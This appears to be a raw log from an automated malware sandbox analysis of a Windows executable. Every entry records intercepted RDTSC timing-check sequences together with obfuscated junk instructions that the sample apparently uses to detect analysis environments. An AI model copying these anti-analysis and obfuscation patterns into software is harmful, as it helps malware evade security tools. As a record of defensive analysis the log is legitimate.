Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F978 second address: 76F97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F97C second address: 76F99E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FF628B69594h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F99E second address: 76F9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FF628D73F56h 0x0000000f jnc 00007FF628D73F56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7701C0 second address: 7701C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7705C9 second address: 7705CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7705CF second address: 7705D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7705D5 second address: 7705DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7705DA second address: 77062B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF628B69586h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FF628B6958Eh 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pushad 0x00000018 ja 00007FF628B69586h 0x0000001e jnp 00007FF628B69586h 0x00000024 push esi 0x00000025 pop esi 0x00000026 jmp 00007FF628B69597h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e jno 00007FF628B69586h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77062B second address: 77062F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 770768 second address: 77076C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77076C second address: 77077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF628D73F5Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 770EAE second address: 770EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7710A2 second address: 7710A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7710A8 second address: 7710C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7710C3 second address: 7710DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F67h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 771512 second address: 771516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77427C second address: 7742B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF628D73F69h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007FF628D73F65h 0x00000014 jmp 00007FF628D73F5Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7747EE second address: 7747F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7443AE second address: 7443B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7443B2 second address: 7443B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77B853 second address: 77B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF628D73F69h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77D81C second address: 77D82A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77F25F second address: 77F269 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77F30B second address: 77F312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77F3AF second address: 77F3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77F49F second address: 77F4A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77F9B9 second address: 77F9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], ebx 0x00000009 add esi, 440095CAh 0x0000000f nop 0x00000010 push esi 0x00000011 pushad 0x00000012 je 00007FF628D73F56h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF628D73F60h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77FBF5 second address: 77FBFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77FEB2 second address: 77FEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 77FEB6 second address: 77FEBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 780041 second address: 780047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 782813 second address: 78281D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78281D second address: 782823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 782823 second address: 78283D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF628B6958Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78283D second address: 782843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 782843 second address: 782847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7854AF second address: 78553F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FF628D73F58h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FF628D73F58h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 jnl 00007FF628D73F68h 0x00000047 or dword ptr [ebp+12489FB1h], edi 0x0000004d push 00000000h 0x0000004f xor si, 812Ah 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 jo 00007FF628D73F58h 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF628D73F5Fh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78553F second address: 785543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78905B second address: 789060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 785C8A second address: 785C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 785C90 second address: 785C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 785C94 second address: 785CA5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 740D08 second address: 740D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78BABF second address: 78BB36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FF628B69597h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FF628B69588h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FF628B69588h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D23E3h], ebx 0x0000004d cld 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push edi 0x00000053 pop edi 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78BB36 second address: 78BB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78CA60 second address: 78CAB2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF628B6958Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, 6C109E01h 0x00000012 mov edi, edx 0x00000014 push 00000000h 0x00000016 jmp 00007FF628B6958Dh 0x0000001b push 00000000h 0x0000001d jnc 00007FF628B69597h 0x00000023 xchg eax, esi 0x00000024 push ecx 0x00000025 pushad 0x00000026 jmp 00007FF628B6958Bh 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78BD0C second address: 78BD17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF628D73F56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78CAB2 second address: 78CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FF628B69595h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78BD17 second address: 78BD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D2BF9h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FF628D73F58h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f push esi 0x00000030 cld 0x00000031 pop ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 call 00007FF628D73F62h 0x0000003e mov ebx, dword ptr [ebp+122D3706h] 0x00000044 pop edi 0x00000045 mov eax, dword ptr [ebp+122D0C9Dh] 0x0000004b movsx ebx, ax 0x0000004e push FFFFFFFFh 0x00000050 jmp 00007FF628D73F63h 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78BD96 second address: 78BD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78EA5F second address: 78EA64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78EA64 second address: 78EACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF628B69588h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3624h] 0x0000002a push 00000000h 0x0000002c sub ebx, 27E4C14Ah 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FF628B69588h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov bx, 385Bh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78EACF second address: 78EAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78EAD3 second address: 78EAE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78EAE2 second address: 78EAEC instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628D73F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FADA second address: 78FAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FAE1 second address: 78FB00 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF628D73F65h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FB00 second address: 78FB18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF628B69590h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FB18 second address: 78FB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FB1C second address: 78FB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FF628B69588h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D229Ch], esi 0x00000028 push 00000000h 0x0000002a mov di, F8D4h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FF628B69588h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a pushad 0x0000004b mov bx, 5424h 0x0000004f mov cx, ax 0x00000052 popad 0x00000053 mov dword ptr [ebp+124558D5h], ecx 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jmp 00007FF628B6958Dh 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FB97 second address: 78FB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FB9C second address: 78FBA6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628B6958Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FD06 second address: 78FD0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FD0C second address: 78FD29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b je 00007FF628B6958Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FD29 second address: 78FDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 mov ebx, 7DD6FA9Bh 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov dword ptr [ebp+12460BE0h], ebx 0x00000018 mov ebx, dword ptr [ebp+122D2EF9h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FF628D73F58h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f sub dword ptr [ebp+122D2226h], edx 0x00000045 mov eax, dword ptr [ebp+122D0CE5h] 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007FF628D73F58h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 jmp 00007FF628D73F65h 0x0000006a push FFFFFFFFh 0x0000006c mov dword ptr [ebp+122D2157h], ebx 0x00000072 mov dword ptr [ebp+12489CF0h], ebx 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FDCB second address: 78FDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FDCF second address: 78FDD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78FDD5 second address: 78FDDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF628B69586h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7929FC second address: 792A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 792A01 second address: 792A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF628B69588h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2226h], ecx 0x00000028 push 00000000h 0x0000002a call 00007FF628B6958Bh 0x0000002f mov di, F4FCh 0x00000033 pop ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FF628B69588h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 movzx edi, di 0x00000053 push eax 0x00000054 js 00007FF628B6958Eh 0x0000005a push edi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 793AE8 second address: 793AF9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 793AF9 second address: 793B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF628B69599h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D36FEh], ecx 0x00000017 mov ebx, dword ptr [ebp+122D360Dh] 0x0000001d push 00000000h 0x0000001f pushad 0x00000020 xor dword ptr [ebp+122D211Eh], eax 0x00000026 movsx ecx, si 0x00000029 popad 0x0000002a push 00000000h 0x0000002c mov ebx, 02264D3Bh 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FF628B69590h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 793B51 second address: 793B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
